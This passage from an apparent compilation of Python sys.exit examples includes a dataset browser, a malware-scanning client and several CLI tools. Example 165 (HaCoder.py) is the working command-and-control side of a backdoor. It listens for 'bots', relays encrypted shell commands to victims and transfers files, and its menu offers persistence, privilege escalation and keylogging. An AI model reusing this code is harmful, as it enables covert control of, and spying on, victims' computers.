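Every menu handler in the Xerosploit example above funnels the 'exit' command into sys.exit(exit_msg), while the final line uses sys.exit(0). The two calls behave differently: an integer argument becomes the process exit status, whereas any other object is printed to stderr and the status becomes 1, which is how the tool shows a goodbye message on its way out. A minimal sketch of that pattern (the message text and the handle function are illustrative, not taken from the project):

import sys

exit_msg = "[++] Shutting down..."  # hypothetical goodbye banner

def handle(command):
    if command == "exit":
        # sys.exit raises SystemExit(exit_msg); a non-integer argument
        # is printed to stderr and the exit status becomes 1.
        sys.exit(exit_msg)
    # a success path would call sys.exit(0) instead

handle("exit")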

Example 162

Project: pylearn2 Source File: browse_norb.py
def main():
    """Top-level function."""

    args = _parse_args()

    if args.pkl is not None:
        dataset = serial.load(args.pkl)
    else:
        dataset = NORB(args.which_norb, args.which_set)

    # Indexes into the first 5 labels, which live on a 5-D grid.
    grid_indices = [0, ] * 5

    grid_to_short_label = _make_grid_to_short_label(dataset)

    # Maps 5-D label vector to a list of row indices for dataset.X, dataset.y
    # that have those labels.
    label_to_row_indices = _make_label_to_row_indices(dataset.y)

    # Indexes into the row index lists returned by label_to_row_indices.
    object_image_index = [0, ]
    blank_image_index = [0, ]
    blank_label = _get_blank_label(dataset)

    # Index into grid_indices currently being edited
    grid_dimension = [0, ]

    dataset_is_stereo = 's' in dataset.view_converter.axes
    figure, all_axes = pyplot.subplots(1,
                                       3 if dataset_is_stereo else 2,
                                       squeeze=True,
                                       figsize=(10, 3.5))

    set_name = (os.path.split(args.pkl)[1] if args.which_set is None
                else "%sing set" % args.which_set)
    figure.canvas.set_window_title("NORB dataset (%s)" % set_name)

    label_text = figure.suptitle('Up/down arrows choose label, '
                                 'left/right arrows change it',
                                 x=0.1,
                                 horizontalalignment="left")

    # Hides axes' tick marks
    for axes in all_axes:
        axes.get_xaxis().set_visible(False)
        axes.get_yaxis().set_visible(False)

    text_axes, image_axes = (all_axes[0], all_axes[1:])
    image_captions = (('left', 'right') if dataset_is_stereo
                      else ('mono image', ))

    if args.stereo_viewer:
        image_captions = tuple(reversed(image_captions))

    for image_ax, caption in safe_zip(image_axes, image_captions):
        image_ax.set_title(caption)

    text_axes.set_frame_on(False)  # Hides background of text_axes

    def is_blank(grid_indices):
        assert len(grid_indices) == 5
        assert all(x >= 0 for x in grid_indices)

        ci = dataset.label_name_to_index['category']  # category index
        category = grid_to_short_label[ci][grid_indices[ci]]
        category_name = dataset.label_to_value_funcs[ci](category)
        return category_name == 'blank'

    def get_short_label(grid_indices):
        """
        Returns the first 5 elements of the label vector pointed to by
        grid_indices. We use the first 5, since they're the labels used by
        both the 'big' and Small NORB datasets.
        """

        # Need to special-case the 'blank' category, since it lies outside of
        # the grid.
        if is_blank(grid_indices):   # won't happen with SmallNORB
            return tuple(blank_label[:5])
        else:
            return tuple(grid_to_short_label[i][g]
                         for i, g in enumerate(grid_indices))

    def get_row_indices(grid_indices):
        short_label = get_short_label(grid_indices)
        return label_to_row_indices.get(short_label, None)

    axes_to_pixels = {}

    def redraw(redraw_text, redraw_images):
        row_indices = get_row_indices(grid_indices)

        if row_indices is None:
            row_index = None
            image_index = 0
            num_images = 0
        else:
            image_index = (blank_image_index
                           if is_blank(grid_indices)
                           else object_image_index)[0]
            row_index = row_indices[image_index]
            num_images = len(row_indices)

        def draw_text():
            if row_indices is None:
                padding_length = dataset.y.shape[1] - len(grid_indices)
                current_label = (tuple(get_short_label(grid_indices)) +
                                 (0, ) * padding_length)
            else:
                current_label = dataset.y[row_index, :]

            label_names = dataset.label_index_to_name

            label_values = [label_to_value(label) for label_to_value, label
                            in safe_zip(dataset.label_to_value_funcs,
                                        current_label)]

            lines = ['%s: %s' % (t, v)
                     for t, v
                     in safe_zip(label_names, label_values)]

            if dataset.y.shape[1] > 5:
                # Inserts image number & blank line between editable and
                # fixed labels.
                lines = (lines[:5] +
                         ['No such image' if num_images == 0
                          else 'image: %d of %d' % (image_index + 1,
                                                    num_images),
                          '\n'] +
                         lines[5:])

            # prepends the current index's line with an arrow.
            lines[grid_dimension[0]] = '==> ' + lines[grid_dimension[0]]

            text_axes.clear()

            # "transAxes": 0, 0 = bottom-left, 1, 1 at upper-right.
            text_axes.text(0, 0.5,  # coords
                           '\n'.join(lines),
                           verticalalignment='center',
                           transform=text_axes.transAxes)

        def draw_images():
            if row_indices is None:
                for axis in image_axes:
                    axis.clear()
            else:
                data_row = dataset.X[row_index:row_index + 1, :]

                axes_names = dataset.view_converter.axes
                assert len(axes_names) in (4, 5)
                assert axes_names[0] == 'b'
                assert axes_names[-3] == 0
                assert axes_names[-2] == 1
                assert axes_names[-1] == 'c'

                def draw_image(image, axes):
                    assert len(image.shape) == 2
                    norm = matplotlib.colors.NoNorm() if args.no_norm else None
                    axes_to_pixels[axes] = image
                    axes.imshow(image, norm=norm, cmap='gray')

                if 's' in axes_names:
                    image_pair = \
                        dataset.get_topological_view(mat=data_row,
                                                     single_tensor=True)
                    # Shaves off the singleton dimensions
                    # (batch # and channel #), leaving just 's', 0, and 1.
                    image_pair = tuple(image_pair[0, :, :, :, 0])

                    if args.stereo_viewer:
                        image_pair = tuple(reversed(image_pair))

                    for axis, image in safe_zip(image_axes, image_pair):
                        draw_image(image, axis)
                else:
                    image = dataset.get_topological_view(mat=data_row)
                    image = image[0, :, :, 0]
                    draw_image(image, image_axes[0])

        if redraw_text:
            draw_text()

        if redraw_images:
            draw_images()

        figure.canvas.draw()

    default_status_text = ("mouseover image%s for pixel values" %
                           ("" if len(image_axes) == 1 else "s"))
    status_text = figure.text(0.5, 0.1, default_status_text)

    def on_mouse_motion(event):
        original_text = status_text.get_text()

        if event.inaxes not in image_axes:
            status_text.set_text(default_status_text)
        else:
            pixels = axes_to_pixels[event.inaxes]
            row = int(event.ydata + .5)
            col = int(event.xdata + .5)
            status_text.set_text("Pixel value: %g" % pixels[row, col])

        if status_text.get_text() != original_text:
            figure.canvas.draw()

    def on_key_press(event):

        def add_mod(arg, step, size):
            return (arg + size + step) % size

        def incr_index_type(step):
            num_dimensions = len(grid_indices)
            if dataset.y.shape[1] > 5:
                # If dataset is big NORB, add one for the image index
                num_dimensions += 1

            grid_dimension[0] = add_mod(grid_dimension[0],
                                        step,
                                        num_dimensions)

        def incr_index(step):
            assert step in (0, -1, 1), ("Step was %d" % step)

            image_index = (blank_image_index
                           if is_blank(grid_indices)
                           else object_image_index)

            if grid_dimension[0] == 5:  # i.e. the image index
                row_indices = get_row_indices(grid_indices)
                if row_indices is None:
                    image_index[0] = 0
                else:
                    # increment the image index
                    image_index[0] = add_mod(image_index[0],
                                             step,
                                             len(row_indices))
            else:
                # increment one of the grid indices
                gd = grid_dimension[0]
                grid_indices[gd] = add_mod(grid_indices[gd],
                                           step,
                                           len(grid_to_short_label[gd]))

                row_indices = get_row_indices(grid_indices)
                if row_indices is None:
                    image_index[0] = 0
                else:
                    # some grid indices have 2 images instead of 3.
                    image_index[0] = min(image_index[0], len(row_indices) - 1)

        # Disables left/right key if we're currently showing a blank,
        # and the current index type is neither 'category' (0) nor
        # 'image number' (5)
        disable_left_right = (is_blank(grid_indices) and
                              not (grid_dimension[0] in (0, 5)))

        if event.key == 'up':
            incr_index_type(-1)
            redraw(True, False)
        elif event.key == 'down':
            incr_index_type(1)
            redraw(True, False)
        elif event.key == 'q':
            sys.exit(0)
        elif not disable_left_right:
            if event.key == 'left':
                incr_index(-1)
                redraw(True, True)
            elif event.key == 'right':
                incr_index(1)
                redraw(True, True)

    figure.canvas.mpl_connect('key_press_event', on_key_press)
    figure.canvas.mpl_connect('motion_notify_event', on_mouse_motion)
    redraw(True, True)

    pyplot.show()
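
Example 162 binds sys.exit(0) to the 'q' key of the matplotlib figure so the dataset browser can be closed from the keyboard. Below is a stripped-down sketch of that wiring, assuming an interactive backend; note that some GUI backends catch exceptions raised inside callbacks, so the SystemExit may be reported rather than terminating the process.

import sys

from matplotlib import pyplot

def on_key_press(event):
    # Mirror Example 162: 'q' exits with a success status.
    if event.key == 'q':
        sys.exit(0)

figure, axes = pyplot.subplots()
axes.set_title("press 'q' to quit")
figure.canvas.mpl_connect('key_press_event', on_key_press)
pyplot.show()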

Example 163

Project: laikaboss Source File: cloudscan.py
def main():

    parser = OptionParser(usage="usage: %prog [options] (/path/to/file | stdin)")
    parser.add_option("-d", "--debug",
                      action="store_true",
                      dest="debug",
                      help="enable debug messages to the console.")
    parser.add_option("-r", "--remove-limit",
                      action="store_true",
                      dest="nolimit",
                      help="disable 20mb size limit (be careful!)")
    parser.add_option("-t", "--timeout",
                      action="store", type="int",
                      dest="timeout",
                      help="adjust request timeout period (in seconds)")
    parser.add_option("-c", "--config-path",
                      action="store", type="string",
                      dest="config_path",
                      help="specify a path to cloudscan.conf.")
    parser.add_option("-a", "--address",
                      action="store", type="string",
                      dest="broker_host",
                      help="specify an IP and port to connect to the broker")
    parser.add_option("-f", "--file-list",
                      action="store", type="string",
                      dest="file_list",
                      help="Specify a list of files to scan")
    parser.add_option("-s", "--ssh-host",
                      action="store", type="string",
                      dest="ssh_host",
                      help="specify a host for the SSH tunnel")
    parser.add_option("-p", "--num-procs",
                      action="store", type="int", default=6,
                      dest="num_procs",
                      help="Specify the number of processors to use for recursion")
    parser.add_option("-u", "--source",
                      action="store", type="string",
                      dest="source",
                      help="specify a custom source")
    parser.add_option("--ssh",
                      action="store_true",
                      default=False,
                      dest="use_ssh",
                      help="Use SSH tunneling")
    parser.add_option("-l", "--level",
                      action="store", type="string",
                      dest="return_level",
                      help="Return Level: minimal, metadata, full [default: metadata]")
    parser.add_option("-o", "--out-path",
                      action="store", type="string",
                      dest="save_path",
                      help="If Return Level Full has been specified, provide a path to "
                            "save the results to [default: current directory]")
    parser.add_option("-b", "--buffer",
                      action="store_true",
                      dest="stdin_buffer",
                      help="Specify to allow a buffer to be collected by stdin.")
    parser.add_option("-e", "--ephID",
                      action="store", type="string",
                      dest="ephID", default="",
                      help="Specify an ephID to send to Laika.")
    parser.add_option("-m", "--ext-metadata",
                      action="store",
                      dest="ext_metadata",
                      help="Specify external metadata to be passed into the scanner.")
    parser.add_option("-z", "--log",
                      action="store_true",
                      dest="log_db",
                      help="Specify to turn on logging results.")
    parser.add_option("-R", "--recursive",
                      action="store_true",
                      default=False,
                      dest="recursive",
                      help="Enable recursive directory scanning. If enabled, all files "
                            "in the specified directory will be scanned. Results will "
                            "be output to cloudscan.log in the current directory.")
    (options, args) = parser.parse_args()


    # Define default configuration location
    CONFIG_PATH = "/etc/laikaboss/cloudscan.conf"

    if options.config_path:
        CONFIG_PATH = options.config_path
    
    Config = ConfigParser.ConfigParser()
    Config.read(CONFIG_PATH)

    # Parse through the config file and append each section to a single dictionary
    global configs
    for section in Config.sections():
        configs.update(dict(Config.items(section)))

    # Set the working path; this will be used for file output if another
    # path is not specified
    WORKING_PATH = os.getcwd()

    if options.use_ssh:
        USE_SSH = True
    else: 
        if strtobool(getConfig('use_ssh')):
            USE_SSH = True
        else:
            USE_SSH = False

    if options.ssh_host:
        SSH_HOST = options.ssh_host
    else:
        SSH_HOST = getConfig('ssh_host')
        
    if options.broker_host:
        BROKER_HOST = options.broker_host
    else:
        BROKER_HOST = getConfig('broker_host')
 
    if options.debug:
        logging.basicConfig(level=logging.DEBUG)

    logging.debug("Host: %s" % BROKER_HOST)

    if options.return_level:
        RETURN_LEVEL = options.return_level
    else:
        RETURN_LEVEL = getConfig('return_level')

    if options.source:
        SOURCE = options.source
    else:
        SOURCE = "cloudscan"

    if not options.log_db:
        SOURCE += "-nolog"
     
    if options.save_path:
        SAVE_PATH = options.save_path
    else:
        SAVE_PATH = WORKING_PATH
    
    if options.num_procs:
        num_procs = int(options.num_procs)
    else:
        num_procs = int(getConfig('num_procs'))

    if options.timeout:
        logging.debug("default timeout changed to %i" % options.timeout)
        REQUEST_TIMEOUT = options.timeout * 1000
    else:
        REQUEST_TIMEOUT = int(getConfig('request_timeout'))

    if options.ext_metadata:
        try:
            if os.path.exists(options.ext_metadata):
                with open(options.ext_metadata) as metafile:
                    ext_metadata = json.loads(metafile.read())
            else:
                ext_metadata = json.loads(options.ext_metadata)
            assert isinstance(ext_metadata, dict)
        except:
            print "External Metadata must be a dictionary!"
            sys.exit(0)
    else:
        ext_metadata = dict()

    REQUEST_RETRIES = int(getConfig('request_retries'))
    
    # Attempt to get the hostname
    try:
        hostname = gethostname().split('.')[0] 
    except:
        hostname = "none"

    
    # Attempt to set the return level, throw an error if it doesn't exist.
    try:
        return_level = globals()["level_%s" % RETURN_LEVEL]
    except KeyError as e:
        print "Please specify a valid return level: minimal, metadata or full"
        sys.exit(1)

    if not options.recursive:
        try:
            file_buffer = ''
            # Try to read the file

            if len(args) > 0:
                file_buffer = open(args[0], 'rb').read()
                file_len = len(file_buffer)
                logging.debug("opened file %s with len %i" % (args[0], file_len))
            else:
                while sys.stdin in select.select([sys.stdin], [], [], 0)[0]:
                    line = sys.stdin.readline()
                    if not line:
                        break
                    else:
                        file_buffer += line

                if not file_buffer:
                    parser.print_usage()
                    sys.exit(1)
                
                file_len = len(file_buffer)

            if file_len > 20971520 and not options.nolimit:
                print "You're trying to scan a file larger than 20mb.. Are you sure?"
                print "Use the --remove-limit flag if you really want to do this."
                sys.exit(1)
        except IOError as e:
            print "\nERROR: The file does not exist: %s\n" % (args[0],)
            sys.exit(1)
    else:
        try:
            fileList = []
            if options.file_list:
                fileList = open(options.file_list).read().splitlines()
            else:
                if len(args) > 0:
                    rootdir = args[0]
                    for root, subFolders, files in os.walk(rootdir):
                        for fname in files:
                            fileList.append(os.path.join(root, fname))
                else:
                    while sys.stdin in select.select([sys.stdin], [], [], 0)[0]:
                        line = sys.stdin.readline()
                        if not line:
                            break
                        else:
                            fileList.append(line)
                    if not fileList:
                        parser.print_usage()
                        sys.exit(1)

            
            if len(fileList) > 1000 and not options.nolimit:
                print "You're trying to scan over 1000 files... Are you sure?"
                print "Use the --remove-limit flag if you really want to do this."
                sys.exit(1)

        except IOError as e:
            print "\nERROR: Directory does not exist: %s\n" % (args[0],)
            sys.exit(1)


   
    if not options.recursive: 
        # Construct the object to be sent for scanning
        if args:
            filename = args[0]
        else:
            filename = "stdin"

        ext_metadata['server'] = hostname
        ext_metadata['user'] = getpass.getuser()
        externalObject = ExternalObject(buffer=file_buffer, 
                                        externalVars=ExternalVars(filename=filename, 
                                                                  ephID=options.ephID,
                                                                  extMetaData=ext_metadata,
                                                                  source="%s-%s-%s" % (SOURCE,
                                                                         hostname,
                                                                         getpass.getuser())),
                                        level=return_level)
    try:
        if not options.recursive:
            # Set up ZMQ context 
            if USE_SSH:
                try:
                    logging.debug("attempting to connect to broker at %s and SSH host %s" % (BROKER_HOST, SSH_HOST))
                    client = Client(BROKER_HOST, useSSH=True, sshHost=SSH_HOST, useGevent=True)
                except RuntimeError as e:
                    logging.exception("could not set up SSH tunnel to %s" % SSH_HOST)
                    sys.exit(1)
            else:
                logging.debug("SSH has been disabled.")
                client = Client(BROKER_HOST, useGevent=True)

            starttime = time.time()
            result = client.send(externalObject, retry=REQUEST_RETRIES, timeout=REQUEST_TIMEOUT)
            logging.debug("got reply in %s seconds" % str(time.time() - starttime))
            if result:
                rootObject = getRootObject(result)
                try:
                    jsonResult = getJSON(result)
                    print jsonResult
                except:
                    logging.exception("error occured collecting results")
                    return
                if return_level == level_full:
                    SAVE_PATH = "%s/%s" % (SAVE_PATH, get_scanObjectUID(rootObject))
                    if not os.path.exists(SAVE_PATH):
                        try:
                            os.makedirs(SAVE_PATH)
                            print "\nWriting results to %s...\n" % SAVE_PATH
                        except (OSError, IOError) as e:
                            print "\nERROR: unable to write to %s...\n" % SAVE_PATH
                            return
                    else:
                        print "\nOutput folder already exists! Skipping results output...\n"
                        return
                    for uid, scanObject in result.files.iteritems():
                        f = open("%s/%s" % (SAVE_PATH, uid), "wb")
                        f.write(scanObject.buffer)
                        f.close()
                        try:
                            if scanObject.filename and scanObject.parent:
                                linkPath = "%s/%s" % (SAVE_PATH, scanObject.filename.replace("/","_"))
                                if not os.path.lexists(linkPath):
                                    os.symlink("%s" % (uid), linkPath)
                            elif scanObject.filename:
                                filenameParts = scanObject.filename.split("/")
                                os.symlink("%s" % (uid), "%s/%s" % (SAVE_PATH, filenameParts[-1]))
                        except:
                            print "Unable to create symlink for %s" % (uid)

                    f = open("%s/%s" % (SAVE_PATH, "results.log"), "wb")
                    f.write(jsonResult)
                    f.close()
                    sys.exit(1)
            else:
                print "ERROR: No result received (scan timed out)"
                return
        else:
            try:
                fh = open('cloudscan.log', 'w')
                fh.close()
            except:
                pass

            for fname in fileList:
                job_queue.put(fname)

            for i in range(num_procs):
                job_queue.put("STOP")

            print "File list length: %s" % len(fileList)

            for i in range(num_procs):
                Process(target=worker, args=(options.nolimit, REQUEST_RETRIES, REQUEST_TIMEOUT, SAVE_PATH, SOURCE, return_level, hostname, USE_SSH, BROKER_HOST, SSH_HOST,ext_metadata,options.ephID,)).start()
   
            results_processed = 0
            while results_processed < len(fileList):
                logging.debug("Files left: %s" % ((len(fileList) - results_processed)))
                resultText = result_queue.get()
                try:
                    # Process results
                    fh = open('cloudscan.log', 'ab')
                    fh.write('%s\n' % resultText)
                    fh.close()
                    results_processed += 1
                except Exception as e:
                    raise

            print 'Wrote results to cloudscan.log'

    except KeyboardInterrupt:
        print "Interrupted by user, exiting..."
        sys.exit(1)
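
Example 163 uses sys.exit(1) consistently for failure paths: unreadable files, oversized inputs, bad return levels, and empty stdin all report an error and hand a non-zero status back to the shell. A self-contained Python 3 sketch of that validate-or-exit pattern (scan.py and read_payload are hypothetical names, not part of laikaboss):

import sys

def read_payload(path):
    try:
        with open(path, 'rb') as handle:
            return handle.read()
    except IOError as error:
        # Report the failure and signal it to the shell with status 1.
        print("ERROR: could not read %s: %s" % (path, error), file=sys.stderr)
        sys.exit(1)

if __name__ == '__main__':
    if len(sys.argv) != 2:
        print("usage: scan.py /path/to/file", file=sys.stderr)
        sys.exit(1)
    print("read %d bytes" % len(read_payload(sys.argv[1])))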

Example 164

Project: synt Source File: __init__.py
def main():

    if not os.path.exists(config.SYNT_PATH):
        os.makedirs(config.SYNT_PATH)

        #copy user config for first time run
        if not os.path.exists(config.USER_CONFIG_PATH):
            user_config = os.path.join(config.PROJECT_PATH, 'user_config.py')
            target_config = config.USER_CONFIG_PATH
            shutil.copy(user_config, target_config)

            print("First time run created a config in ~/.synt that Synt will use. Please make sure everything is ok then re-run your previous commands.")
            return

    parser = argparse.ArgumentParser(description='Tool to interface with synt, provides a way to train, collect and guess from the command line.')
    subparsers = parser.add_subparsers(dest='parser')

    #Train Parser
    train_parser = subparsers.add_parser(
        'train',
        help='Train a classifier.'
    )
    train_parser.add_argument(
        'db_name',
        help="The name of the training database to use. They are stored/retreived from ~/.synt/"
    )
    train_parser.add_argument(
        'samples',
        type=int,
        help="The amount of samples to train on. Uses the samples.db",
    )
    train_parser.add_argument(
        '--classifier_type',
        default='naivebayes',
        choices=('naivebayes',),
        help="The classifier to use. See help for currently supported classifier.",
    )
    train_parser.add_argument(
        '--extractor_type',
        default='stopwords',
        choices=('words', 'stopwords', 'bestwords'),
        help="The feature extractor to use. By default this uses stopwords filtering.",
    )
    train_parser.add_argument(
        '--best_features',
        type=int,
        default=0,
        help="The amount of best words to use, or best features. This should be used in conjunction with bestwords extractor.",
    )
    train_parser.add_argument(
        '--purge',
        default='no',
        choices=('yes', 'no'),
        help="Yes to purge the redis database. By default no."
    )
    train_parser.add_argument(
        '--processes',
        default=4,
        help="Will utilize multiprocessing if available with this number of processes. By default 4."
    )

    #Collect parser
    d = datetime.datetime.now()
    db_name = "samples-%s-%s-%s.db" % (d.year, d.month, d.day)

    collect_parser = subparsers.add_parser(
        'collect',
        help='Collect samples.'
    )
    collect_parser.add_argument(
        '--db_name',
        default=db_name,
        help="Optional database name to store as.",
    )
    collect_parser.add_argument(
        '--commit_every',
        default=200,
        type=int,
        help="Write to sqlite database after every 'this number'. Default is 200",
    )
    collect_parser.add_argument(
        '--max_collect',
        default=2000000,
        type=int,
        help="The amount to stop collecting at. Default is 2 million",
    )
    collect_parser.add_argument(
        '--query_file',
        default='',
        type=str,
        help="Absolute path to query file to use.",
    )

    #Fetch parser
    fetch_parser = subparsers.add_parser(
        'fetch',
        help='Fetches premade sample database.'
    )
    fetch_parser.add_argument(
        '--db_name',
        help="Fetches the default samples database from github and stores it as 'db' in ~/.synt/. Default db name is 'samples.db'.",
        default='samples.db',
    )

    #Guess parser
    guess_parser = subparsers.add_parser(
        'guess',
        help='Guess sentiment'
    )
    guess_parser.add_argument(
        'guess',
        nargs='?',
        default=True,
        help="Starts the guess prompt.",
    )
    guess_parser.add_argument(
        '--text',
        default='',
        help="Given text, will guess the sentiment on it.",
    )

    #Accuracy parser
    accuracy_parser = subparsers.add_parser(
        'accuracy',
        help="Test accuracy of classifier.",
    )
    accuracy_parser.add_argument(
        '--db_name',
        default='',
        help="""The samples database to use, if left empty the same database that was used for training is used for testing (with fresh samples). Specify db with with a database name located in ~/.synt.""",
    )
    accuracy_parser.add_argument(
        '--test_samples',
        type=int,
        help="""The amount of samples to test on. By default this is figured out internally and amounts to 25%
        of the training sample count. You can override this.""",
        default=0,
    )
    accuracy_parser.add_argument(
        '--neutral_range',
        default=0.2,
        type=float,
        help="Neutral range to use. By default this is 0.2.",
    )
    accuracy_parser.add_argument(
        '--offset',
        default=0,
        type=int,
        help="""By default the test samples are taken from the offset of the trained samples. i.e if 100 samples are trained and we
        are testing on 25 it will start from 100-125 to ensure the testing samples are new. You can override what offset to use
        with this argument.""",
    )

    args = parser.parse_args()

    if args.parser == 'train':
        print("Beginning train on {} database with {} samples.".format(args.db_name, args.samples))

        start = time.time()

        purge = False
        if args.purge == 'yes':
            purge = True

        train(
            db_name         = args.db_name,
            samples         = args.samples,
            classifier_type = args.classifier_type,
            extractor_type  = args.extractor_type,
            best_features   = args.best_features,
            processes       = args.processes,
            purge           = purge,
        )

        print("Finished training in {}.".format(time.time() - start))

    elif args.parser == 'collect':
        print("Beginning collecting {} samples to {}.".format(args.max_collect, args.db_name))

        start = time.time()

        collect(
            db_name      = args.db_name,
            commit_every = args.commit_every,
            max_collect  = args.max_collect,
            query_file   = args.query_file,
        )

        print("Finished collecting samples in {} seconds.".format(time.time() - start))

    elif args.parser == 'fetch':
        print("Beginning fetch to '{}' database.".format(args.db_name))
        fetch(args.db_name)
        print("Finished fetch.")

    elif args.parser == 'guess':
        g = Guesser()

        if args.text:
            print("Guessed: ",  g.guess(args.text))
            sys.exit()

        print("Enter something to calculate the synt of it!")
        print("Press enter to quit.")

        while True:
            text = raw_input("synt> ")
            if not text:
                break
            print('Guessed: {}'.format(g.guess(text)))

    elif args.parser == 'accuracy':
        print("Beginning accuracy test with neutral range {}.".format(args.neutral_range))

        start = time.time()

        n_accur, m_accur, classifier = test_accuracy(
            db_name       = args.db_name,
            test_samples  = args.test_samples,
            neutral_range = args.neutral_range,
            offset        = args.offset,
        )

        print("NLTK Accuracy: {}".format(n_accur))
        print("Manual Accuracy: {}".format(m_accur))

        classifier.show_most_informative_features(50)

        print("Finished testing in {} seconds.".format(time.time() - start))

Example 165

Project: HaCoder.py Source File: HaCoder.py
def globalhandler():
	# clear function
	##################################
	# Windows ---------------> cls
	# Linux   ---------------> clear
	if os.name == 'posix': clf = 'clear'
	if os.name == 'nt': clf = 'cls'
	clear = lambda: os.system(clf)
	clear()

	BLOCK_SIZE=32
	PADDING = '{'
	pad = lambda s: s + (BLOCK_SIZE - len(s) % BLOCK_SIZE) * PADDING
	EncodeAES = lambda c, s: base64.b64encode(c.encrypt(pad(s)))
	DecodeAES = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(PADDING)

	# initialize socket
	c = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	c.bind(('0.0.0.0', portH))
	c.listen(128)

	# client information
	active = False
	clients = []
	socks = []
	interval = 0.8

	# Functions
	###########

	# send data
	def Send(sock, cmd, end="EOFEOFEOFEOFEOFX"):
		sock.sendall(EncodeAES(cipher, cmd + end))

	# receive data
	def Receive(sock, end="EOFEOFEOFEOFEOFX"):
		data = ""
		l = sock.recv(1024)
		while(l):
			decrypted = DecodeAES(cipher, l)

			data += decrypted
			if data.endswith(end) == True:
				break
			else:
				l = sock.recv(1024)
		return data[:-len(end)]

	# download file
	def download(sock, remote_filename, local_filename=None):
		# check if file exists
		if not local_filename:
			local_filename = remote_filename
		try:
			f = open(local_filename, 'wb')
		except IOError:
			print "Error opening file.\n"
			Send(sock, "cd .")
			return
		# start transfer
		Send(sock, "download "+remote_filename)
		print "Downloading: " + remote_filename + " > " + local_filename
		fileData = Receive(sock)
		f.write(fileData)
		time.sleep(interval)
		f.close()
		time.sleep(interval)

	# upload file
	def upload(sock, local_filename, remote_filename=None):
		# check if file exists
		if not remote_filename:
			remote_filename = local_filename
		try:
			g = open(local_filename, 'rb')
		except IOError:
			print "Error opening file.\n"
			Send(sock, "cd .")
			return
		# start transfer
		Send(sock, "upload "+remote_filename)
		print 'Uploading: ' + local_filename + " > " + remote_filename
		while True:
			fileData = g.read()
			if not fileData: break
			Send(sock, fileData, "")
		g.close()
		time.sleep(interval)
		Send(sock, "")
		time.sleep(interval)
	
	# refresh clients
	def refresh():
		clear()
		print bcolors.OKGREEN + '\nListening for bots...\n' + bcolors.ENDC
		if len(clients) > 0:
			for j in range(0,len(clients)):
				print '[' + str((j+1)) + '] Client: ' + clients[j] + '\n'
		else:
			print "...\n"
		# print exit option
		print "---\n"
		print bcolors.FAIL + "[0] Exit \n" + bcolors.ENDC
		print bcolors.WARNING + "\nPress Ctrl+C to interact with client." + bcolors.ENDC
		print bcolors.OKGREEN

	# main loop
	while True:
		refresh()
		# listen for clients
		try:
			# set timeout
			c.settimeout(10)
		
			# accept connection
			try:
				s,a = c.accept()
			except socket.timeout:
				continue
		
			# add socket
			if (s):
				s.settimeout(None)
				socks += [s]
				clients += [str(a)]
		
			# display clients
			refresh()
		
			# sleep
			time.sleep(interval)

		except KeyboardInterrupt:
		
			# display clients
			refresh()
		
			# accept selection --- int, 0/1-128
			activate = input("\nEnter option: ")
		
			# exit
			if activate == 0:
				print '\nExiting...\n'
				for j in range(0,len(socks)):
					socks[j].close()
				sys.exit()
		
			# subtract 1 (array starts at 0)
			activate -= 1
	
			# clear screen
			clear()
		
			# create a cipher object using the random secret
			cipher = AES.new(secret)
			print '\nActivating client: ' + clients[activate] + '\n'
			print "download	Download files from Client"
			print "downhttp	Download file to victim using HTTP"
			print "upload		Upload files from attacker to Client"
			print "persist		Make backdoor run on startup"
			print "privs		Privilege Escalation"
			print "keylog		Activate Keylogger"

			active = True
			Send(socks[activate], 'Activate')
		print bcolors.ENDC
		# interact with client
		while active:
			try:
				# receive data from client
				data = Receive(socks[activate])
			# disconnect client.
			except:
				print '\nClient disconnected... ' + clients[activate]
				# delete client
				socks[activate].close()
				time.sleep(0.8)
				socks.remove(socks[activate])
				clients.remove(clients[activate])
				refresh()
				active = False
				break

			# exit client session
			if data == 'quitted':
				# print message
				print "Exit.\n"
				# remove from arrays
				socks[activate].close()
				socks.remove(socks[activate])
				clients.remove(clients[activate])
				# sleep and refresh
				time.sleep(0.8)
				refresh()
				active = False
				break
			# if data exists
			elif data != '':
				# get next command
				sys.stdout.write(data)
				nextcmd = raw_input()
		
			# download
			if nextcmd.startswith("download ") == True:
				if len(nextcmd.split(' ')) > 2:
					download(socks[activate], nextcmd.split(' ')[1], nextcmd.split(' ')[2])
				else:
					download(socks[activate], nextcmd.split(' ')[1])
		
			# upload
			elif nextcmd.startswith("upload ") == True:
				if len(nextcmd.split(' ')) > 2:
					upload(socks[activate], nextcmd.split(' ')[1], nextcmd.split(' ')[2])
				else:
					upload(socks[activate], nextcmd.split(' ')[1])
		
			# normal command
			elif nextcmd != '':
				Send(socks[activate], nextcmd)

			elif nextcmd == '':

				print 'Think before you type. ;)\n'
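
A caveat that matters for code like Example 165: sys.exit works by raising SystemExit, so the bare except: blocks this example wraps around its socket I/O would also intercept an exit attempted inside them, and finally blocks still run on the way out. A small Python 3 demonstration:

import sys

try:
    sys.exit("going down")
except SystemExit as exc:
    # A broad handler (or a bare "except:") catches SystemExit,
    # because sys.exit only raises this exception.
    print("intercepted SystemExit with payload:", exc)
finally:
    # Cleanup code runs whether or not the exit goes through.
    print("cleanup runs either way")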

Example 166

Project: lamvery Source File: cli.py
def main():
    alias_args = ('-a', '--alias',)
    alias_kwargs = {
        'help': 'Alias for a version of the function',
        'default': None
    }
    conf_file_args = ('-c', '--conf-file',)
    conf_file_kwargs = {
        'help': 'Configuration YAML file (default: .lamvery.yml)',
        'default': '.lamvery.yml'
    }
    dry_run_args = ('-d', '--dry-run',)
    dry_run_kwargs = {
        'help': 'Dry run',
        'action': 'store_true',
        'default': False
    }
    keep_empty_args = ('-k', '--keep-empty-events',)
    keep_empty_kwargs = {
        'help': 'Keep the event rules that do not have any targets.',
        'action': 'store_true',
        'default': False
    }
    single_file_args = ('-s', '--single-file',)
    single_file_kwargs = {
        'help': 'Only use the main lambda function file',
        'action': 'store_true',
        'default': False
    }
    no_libs_args = ('-l', '--no-libs',)
    no_libs_kwargs = {
        'help': 'Archiving without all libraries',
        'action': 'store_true',
        'default': False
    }
    secret_name_args = ('-n', '--secret-name',)
    secret_name_kwargs = {
        'help': 'The name of the secret value',
        'default': None
    }
    publish_args = ('-p', '--publish')
    publish_kwargs = {
        'help': 'Publish the version as an atomic operation',
        'action': 'store_true',
        'default': False
    }
    store_args = ('-s', '--store',)
    store_kwargs = {
        'help': 'Store encrypted value to the configuration file (default: .lamvery.secret.yml)',
        'action': 'store_true',
        'default': False
    }
    version_args = ('-v', '--version',)
    version_kwargs = {
        'help': 'Version of the function',
        'default': None
    }
